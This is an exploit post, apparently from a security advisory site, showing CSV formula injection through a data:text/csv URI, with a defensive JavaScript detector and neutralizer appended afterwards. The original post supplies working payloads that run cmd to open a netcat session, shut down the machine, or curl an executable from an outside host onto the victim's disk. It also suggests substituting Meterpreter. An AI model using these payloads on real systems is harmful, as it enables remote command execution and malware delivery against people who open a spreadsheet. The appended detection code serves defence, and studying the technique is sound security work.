Utf-8 url Encoding CSV Injection without server interaction Vulnerability

====================================================================================================================================
| # Title : Utf-8 url Encoding CSV Injection without server interaction Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.3(64-bit) |
====================================================================================================================================

poc :

[+] CSV (Comma-Separated Values) is not a programming language,
but rather a file format that stores data in a tabular form,
where each row represents a record and each column represents a field within that record.
The values within each row are separated by a comma, hence the name "Comma-Separated Values."
CSV files can be read and written by a variety of programming languages, including but not limited to Python, Java, C++,
and JavaScript. These languages provide libraries and functions for reading and writing CSV files,
and can be used to process and manipulate the data stored in the file. However, the CSV file format itself is language-agnostic
and can be used with any programming language that can handle text files.
CSV files are an essential part of computer science when you work with websites and databases.
There might be some cases when the user has some data in the browser that you want to let them download.
In that case, CSV files help the programmer to offer the website data for download in tabular form.
Programmers use the CSV file format for the users to download the website data.
CSV is a simple and easy format to store the website data in tabular form. With the help of JavaScript,
you can collect the data from the HTML page and create a CSV file or also create the data manually.
You can open the CSV file in MS-Excel and see the data present inside it.
Almost every database requires CSV files to back up the data.
To export the data from the website, programmers use CSV files. CSV files can be created and downloaded using JavaScript.
Not all web browsers use the CSV format as a default, but all web browsers can open and display CSV files.
Browsers can open and display CSV files when they are downloaded to a computer or when a URL for the file is specified on the internet.
However, a certain number of browsers provide additional services for working with CSV files,
such as saving and editing services. Also, developers can create web applications based on modern browsers to analyze and display data
stored in CSV files in a more analytical and experimental way.

[+] UTF-8 URL encoding, also known as percent-encoding, is a method of encoding special characters in a URL
or URI (Uniform Resource Identifier). It is used to encode characters that are not allowed in a URL, such as spaces, special characters,
and non-ASCII characters, into a format that can be safely transmitted over the internet.
In UTF-8 URL encoding, each character is represented as a sequence of three characters: a percent sign (%),
followed by two hexadecimal characters that represent the character's numerical value in the UTF-8 encoding.
For example, the space character is represented as "%20".
UTF-8 URL encoding is important because it helps ensure that URLs and URIs are transmitted correctly across the internet
and can be safely used in web applications, APIs, and other internet-based systems.
It also helps ensure that URLs and URIs are consistent and compatible with different systems and languages,
as UTF-8 is a widely-used character encoding that supports a large number of characters from many languages.

[+] Payload : data:text/csv;charset=utf-8,%EF%BB%BFPacketStorm-Security%0AP0C%20By%20indoushka%202023%0A"=cmd|'/C/nc '!",%0AThank%20you%0A

[+] The following payload automatically configures and downloads a CSV file to the target computer without uploading the file to the online web server.
The file contains a command to open a pre-configured Netcat session, which will only open if the target opens the CSV file.
In case the target opens the CSV file, it will be able to access the command.
The Netcat command can be replaced with another payload, such as Meterpreter.

[+] The payload contains UTF-8 URL encoding codes:

%20 gives a space between letters or sentences.
%0A moves to a new line.

[+] malicious code into a CSV "=cmd|'/C/nc '!",

So that the command line always opens in this path: c:\windows\system32\cmd.exe ("=cmd| )
But here in this example we went back two paths in order to open the target application, and the experiment was on my local server. ('/C/nc )

[+] Other commands can be selected, for example,

shutting down or restarting the computer : =cmd|'/C shutdown /r'!",

Or download files remotely : "=cmd|'/C curl https://files3.codecguide.com/klcp_update_1737_20221228.exe -o 1.exe '!",

[+] Downloaded files are always found in the Documents folder

https://c.top4top.io/m_2593xw0eb1.bmp


Greetings to :=============================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|
===========================================================================================
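
Added example, not part of the original post: a defender-side check in JavaScript that decodes a `data:text/csv` URI like the one above, reports cells a spreadsheet would evaluate as formulas, and shows the export-side neutralization (single-quote prefix plus CSV quoting). The function names and the SAMPLE string are assumptions constructed for this example.

```javascript
// Added example: triage a data:text/csv URI for formula cells, and neutralize cells on export.
// SAMPLE is constructed for this example; it mirrors the post's layout (BOM, %20, %0A, quoted cell).
const SAMPLE = 'data:text/csv;charset=utf-8,%EF%BB%BFReport%0ALine%20two%0A"=1+1",%0AThank%20you%0A';
const FORMULA_START = /^\s*[=+\-@]/; // leading characters spreadsheets evaluate as a formula

// Decode the body of a CSV data: URI (percent-encoded or base64); null if not one.
function decodeCsvDataUri(uri) {
  const m = /^data:text\/csv([^,]*),(.*)$/is.exec(uri);
  if (!m) return null;
  try {
    const bytes = s => Uint8Array.from(atob(s), ch => ch.charCodeAt(0));
    const text = /;base64/i.test(m[1]) ? new TextDecoder().decode(bytes(m[2])) : decodeURIComponent(m[2]);
    return text.replace(/^\uFEFF/, ""); // drop the UTF-8 BOM (%EF%BB%BF)
  } catch (e) { return null; } // malformed percent-encoding or base64
}

// Minimal CSV reader: commas, newlines, double-quoted fields with "" escapes.
function parseCsv(text) {
  const rows = [[""]];
  let quoted = false;
  for (let i = 0; i < text.length; i++) {
    const ch = text[i], row = rows[rows.length - 1], last = row.length - 1;
    if (quoted) {
      if (ch === '"' && text[i + 1] === '"') { row[last] += '"'; i++; }
      else if (ch === '"') quoted = false;
      else row[last] += ch;
    } else if (ch === '"') quoted = true;
    else if (ch === ",") row.push("");
    else if (ch === "\n") rows.push([""]);
    else row[last] += ch;
  }
  return rows;
}

// Detection: 1-based row/column of every cell a spreadsheet would evaluate.
function findFormulaCells(uri) {
  const text = decodeCsvDataUri(uri), hits = [];
  if (text === null) return hits;
  parseCsv(text).forEach((row, r) => row.forEach((cell, c) => {
    if (FORMULA_START.test(cell)) hits.push({ row: r + 1, col: c + 1, cell });
  }));
  return hits;
}

// Mitigation on export: prefix risky cells with ' so they load as text, then CSV-quote.
function neutralizeCell(value) {
  const s = String(value);
  return '"' + (FORMULA_START.test(s) ? "'" + s : s).replace(/"/g, '""') + '"';
}
```

The leading-character test also matches legitimate values such as negative numbers, so apply `neutralizeCell` only to untrusted text fields, or accept that those values load as text.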
 
